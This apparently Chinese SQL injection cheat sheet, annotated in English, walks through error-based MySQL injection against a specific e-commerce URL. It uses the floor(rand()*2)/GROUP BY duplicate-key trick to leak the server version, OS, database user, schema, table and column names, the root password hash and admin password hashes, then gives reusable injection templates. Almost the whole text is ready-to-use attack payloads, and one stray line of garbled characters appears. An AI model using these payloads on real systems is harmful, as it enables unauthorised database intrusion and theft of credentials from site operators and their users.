判断版本号 (determine the MySQL version: @@version is leaked through the floor(rand()*2)/GROUP BY duplicate-key error. This only works when the application echoes database errors back to the client, and because rand() here is unseeded the key collision is probabilistic — a request may have to be repeated before the error appears.)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
判断系统 (determine the server OS via @@version_compile_os)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 user() (the database account the application connects as)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 database() (the schema the application is currently using)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
root hash (SELECT Password FROM mysql.user WHERE User='root' — requires read access to the mysql schema, so it usually fails unless the application account is privileged; on MySQL 5.7 and later the Password column no longer exists and the hash is in authentication_string)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库表名 (table names of the schema char(115,97,110,115,97,110,49) = 'sansan1', read one row per request by stepping the LIMIT offset; this request reads offset 6)
" M) ?! p: v( T- \# b- Q$ J
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库 user_name 字段 (COLUMN_NAME at offset 2 of table char(101,99,115,95,97,100,109,105,110,95,117,115,101,114) = 'ecs_admin_user'; column names are enumerated one per request by changing the LIMIT offset)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库 字段 password (COLUMN_NAME at offset 4 of ecs_admin_user)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
获得 admin passwd(md5) (reads password^user_name for row 0 of sansan1.ecs_admin_user; char(94) = '^' is the separator, and ifnull(...,char(32)) keeps a NULL column from collapsing the whole concat to NULL)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
报错注射 (error-based injection templates. Unlike the URLs above, these use the seeded rand(0), whose output sequence is fixed, so the GROUP BY duplicate-key error is triggered reliably on every request rather than probabilistically.)
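-- Error-based extraction template (UNION form). The inner derived table
-- groups on concat(<value>, floor(rand(0)*2)); because rand(0) is seeded its
-- sequence is fixed, so GROUP BY computes the same key twice and MySQL
-- aborts with a duplicate-entry error whose message contains <value>.
-- Requires the application to echo database errors. Here <value> is version().
-- NOTE(review): the UNION contributes two columns, so this only matches a
-- table_name with exactly two columns — adjust the column count to the target.
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)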
-- Same rand(0)/GROUP BY duplicate-key template as above, but the leaked
-- <value> is the first username from admin_table (LIMIT 0,1); step the
-- offset to read further rows one request at a time.
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
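-- Boolean-context fragment (appended after an existing WHERE condition) using
-- the same rand(0)/GROUP BY duplicate-key trick to leak one schema name per
-- request. 0x7e and 0x27 are '~' and ''' and simply delimit the value so it is
-- easy to spot in the error text. LIMIT 21,1 reads the 22nd row of
-- information_schema.SCHEMATA; the offset is stepped request by request.
-- Note this variant has no LIMIT on the outer GROUP BY, unlike the two above.
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)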